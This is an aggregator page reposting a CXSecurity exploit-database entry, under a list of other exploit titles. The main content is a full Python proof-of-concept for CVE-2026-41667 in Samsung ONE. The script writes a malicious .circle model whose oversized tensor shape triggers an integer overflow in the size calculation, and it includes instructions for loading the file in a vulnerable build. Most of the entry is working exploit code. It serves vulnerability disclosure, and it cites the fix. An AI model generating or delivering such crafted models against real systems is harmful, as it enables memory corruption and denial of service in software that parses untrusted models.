惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

B
Blog RSS Feed
B
Blog
N
Netflix TechBlog - Medium
量子位
月光博客
月光博客
博客园_首页
博客园 - Franky
酷 壳 – CoolShell
酷 壳 – CoolShell
Last Week in AI
Last Week in AI
T
The Blog of Author Tim Ferriss
Hugging Face - Blog
Hugging Face - Blog
雷峰网
雷峰网
M
MIT News - Artificial intelligence
J
Java Code Geeks
大猫的无限游戏
大猫的无限游戏
D
DataBreaches.Net
腾讯CDC
Engineering at Meta
Engineering at Meta
云风的 BLOG
云风的 BLOG
L
LangChain Blog
GbyAI
GbyAI
IT之家
IT之家
Y
Y Combinator Blog
人人都是产品经理
人人都是产品经理

CXSECURITY Database RSS Feed - CXSecurity.com

Langflow 1.3.0 Remote Code Execution Krayin CRM v2.2.x Authenticated Remote Code Execution PraisonAI CodeAgent <= 1.6.77 Remote Code Execution (RCE) via Unsandboxed LLM Code Execution XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 KNX visualisering - Broken Access Control 7-Zip <= 26.02 - Mark-of-the-Web (MotW) Bypass via RAR5 Alternate Data Stream Name Collision NodeBB <= 4.13.2 ActivityPub attributedTo Local UID Spoof - CXSecurity.com KNX visualisering - Broken Access Control vm2 <= 3.11.3 - NodeVM Builtin Denylist Bypass SiYuan <= 3.5.9 Remote Code Execution via Malicious Bazaar Package Windows Defender (MsMpEng.exe) Race Condition -> LPE / SYSTEM / Use-After-Free -> Crash D-Link DSL2600U rom-0 Admin Password Disclosure KNX visualisering - Broken Access Control PHP Link Directory (phpLD) 2.1.3 - SQL Injection, IDOR, CSRF OpenEMR 7.0.2 Arbitrary File Read ZTE ZXHN H188A V6 Authentication Bypass phpLD 2.1.3 (EOL) has authenticated SQLi in admin/dir_validate.php (CATEGORY_ID) and admin ORDER BY (sort), unauthenticated IDOR in add_reciprocal.php, CSRF on admin link actions via GET, and exposed install/ after deployment. Verified locally on v2.1.3. Tenable Terrascan Server <= v1.18.3 SSRF and Local File Read Lenovo LegionSpace 1.7.11.2 DAService Unquoted Service Path ZTE H298A / H108N Unauthenticated Credential Exposure WordPress Contest Gallery 28.1.4 Unauthenticated Blind SQL Injection BrandIT Consultancy - Blind Sql Injection Association Management Script - Multiple Vulnerabilities (IDOR, SQLi, Stored XSS) Canvas Breach: Symbiotic Dual-Virus Model & Origin Parity Evidence Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials ePati Antikor NGFW 2.0.1301 Authentication Bypass Windows Shell LNK Spoofing to NTLMv2 Hash Capture Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service Grav CMS 2.0.0-beta.2 Remote Code Execution
Samsung ONE Integer Overflow in CircleConst Tensor Size C...
Mohammed Idr · 2026-04-27 · via CXSECURITY Database RSS Feed - CXSecurity.com

Samsung ONE Integer Overflow in CircleConst Tensor Size Calculation

#!/usr/bin/env python3 # Exploit Title: Samsung ONE - Integer Overflow in CircleConst Tensor Size Calculation # CVE: CVE-2026-41667 # Date: 2026-04-25 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://github.com/Samsung/ONE # Software Link: https://github.com/Samsung/ONE # Affected: Samsung ONE prior to PR #16481 (before 1.30.0) # Tested on: Samsung ONE (vulnerable build) # Category: Local # Platform: Linux # Exploit Type: Proof of Concept - Malicious Model Generator # CVSS: 6.6 # CWE : CWE-190 # Description: Generates a malicious .circle model that triggers integer overflow in num_elements * element_size calculation. # Fixed in: https://github.com/Samsung/ONE/pull/16481 # Usage: python3 exploit.py # # Examples: # python3 exploit.py # # Options: None (standalone generator) # # Notes: Requires flatc generated 'circle' module. Loads with luci-interpreter or ONE runtime. # # How to Use # # Step 1: Generate bindings with flatc --python circle.fbs # Step 2: Run this script to create poc_cve_2026_41667.circle # Step 3: Load the model in vulnerable ONE build print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║ ║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║ ║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║ ║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║ ║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║ ║ ║ ║ b a n y a m e r _ s e c u r i t y ║ ║ ║ ║ >>> Silent Hunter • Shadow Presence <<< ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ CVE-2026-41667 • Samsung ONE Integer Overflow ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import flatbuffers import sys import os try: import circle as c except ImportError: print("Error: 'circle' module not found.") print("Generate it with: flatc --python compiler/luci/schema/circle.fbs") print("Then copy the generated 'circle' folder here.") sys.exit(1) def create_poc_model(output_path="poc_cve_2026_41667.circle"): builder = flatbuffers.Builder(1024 * 1024) huge_shape = [1, 1, 1, 1 << 30] c.ShapeStartDimsVector(builder, len(huge_shape)) for d in reversed(huge_shape): builder.PrependInt32(d) shape_dims = builder.EndVector() shape = c.Shape.CreateShape(builder, shape_dims) data_bytes = b'\x00' * 64 data_vec = builder.CreateByteVector(data_bytes) c.CircleConstStart(builder) c.CircleConstAddShape(builder, shape) c.CircleConstAddDtype(builder, c.DataType.INT8) c.CircleConstAddBuffer(builder, 0) c.CircleConstAddValue(builder, data_vec) const = c.CircleConstEnd(builder) c.SubGraphStartTensorsVector(builder, 1) builder.PrependUOffsetTRelative(const) tensors = builder.EndVector() c.SubGraphStartInputsVector(builder, 1) builder.PrependInt32(0) subgraph_inputs = builder.EndVector() c.SubGraphStartOutputsVector(builder, 1) builder.PrependInt32(0) subgraph_outputs = builder.EndVector() subgraph = c.SubGraphCreateSubGraph(builder, tensors=tensors, inputs=subgraph_inputs, outputs=subgraph_outputs, operators=None, name=b"main") c.ModelStartSubgraphsVector(builder, 1) builder.PrependUOffsetTRelative(subgraph) subgraphs = builder.EndVector() c.ModelStart(builder) c.ModelAddVersion(builder, 1) c.ModelAddSubgraphs(builder, subgraphs) model = c.ModelEnd(builder) builder.Finish(model) buf = builder.Output() with open(output_path, "wb") as f: f.write(buf) print(f"[+] PoC model created: {output_path}") print(f" Shape: {huge_shape} → ~{1<<30} elements (INT8)") print(f" Load with: ./luci-interpreter {output_path}") if __name__ == "__main__": create_poc_model()



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


Copyright 2026, cxsecurity.com